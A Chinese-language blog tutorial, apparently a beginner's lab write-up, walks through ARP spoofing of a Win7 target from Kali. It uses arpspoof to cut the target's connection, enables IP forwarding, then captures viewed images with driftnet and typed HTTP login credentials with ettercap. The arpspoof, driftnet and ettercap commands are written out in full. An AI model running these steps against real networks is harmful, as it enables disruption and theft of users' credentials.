ARP断网+ARP攻击

242 阅读2分钟
  • ARP断网:目标ip的流量经过我的网卡
  • ARP欺骗:目标ip的流量经过我的网卡,再从网关出去。

实验环境

  • kali(攻击机)
  • win7(靶机)

实验步骤

1.查看win7(靶机)的ip地址、网关和mac地址

ipconfig /all

1687698991477.png

2.查看ARP缓存表中的网关MAC地址

arp -a

1687699140514.png

3.查看kali(攻击机)的mac地址

ifconfig

1687699205821.png

4.扫描主机,查看活跃(alive)的主机,以确定要攻击的Ip地址

fping –s –r 1 -g 192.168.171.0/24

-s 选项表示显示最终结果,-r 选项设置尝试次数,-g 选项设置扫描范围

1687699370300.png

5.arpspoof断网攻击

arpspoof -i eth0 -t 192.168.171.128 192.168.171.2

命令格式:arpspoof  -i   网卡  -t 目标ip   网关
-i 后面的参数是网卡名称
-t 后面的参数是目的主机和网关,截获目的主机发往网关的数据包

1687699469675.png
受到断网攻击的win7系统无法ping通百度

1687699533333.png

6.查看win7(靶机)网关的mac地址攻击前后的变化:

攻击前(win7):

1687699578753.png
攻击前(kali):

1687699621989.png
攻击后(win7):

1687699662365.png
可以看到,win7(靶机)的mac地址替换成kali的mac地址了,也无法访问互联网了。

7.攻击利用:内网截获图片

  • /proc/sys/net/ipv4/ip_forward=0 为不转发
  • 修改/proc/sys/net/ipv4/ip_forward 的值使其等于1,开启流量转发,并查看
    echo 1 >/proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward

1687699884708.png

8.在kali攻击机中利用driftnet工具 ,捕获win7靶机浏览的图片

检查安装driftnet工具: apt-get install driftnet
1687699982484.png
使用eth0网卡启动driftnet工具:driftnet -i eth0

1687700133280.png
出现红框中的警告不用管,不影响我们正常使用 !!!

9.在win7靶机中访问一个http网页

我们拿超星学习通来举例,网址http://mooc1.chaoxing.com/

1687700325074.png 在kali中成功捕获到win7浏览页面的图片

1687700390668.png

10.使用ettercap 工具抓取流量数据

启动图形化界面 ettercap -G

1687700459479.png
选好网卡之后我们去扫描这个网段下面的主机,点击红框中的勾

1687700512144.png
点击1图标,没有靶机ip和网关就点击2图标多扫描几次

1687700572938.png
分别把win7的ip和网关加入target1和target2中

1687700636218.png
选择ARP POISONING

1687700686627.png
按照上图选择并点击ok即可

11.在win7中访问一个http网页

本次实验使用网址http://v3.chaoxing.com

1687700788723.png

1687700967471.png
在kali中可以看到靶机中输入的账号和密码

刚入坑网安,欢迎一起讨论交流~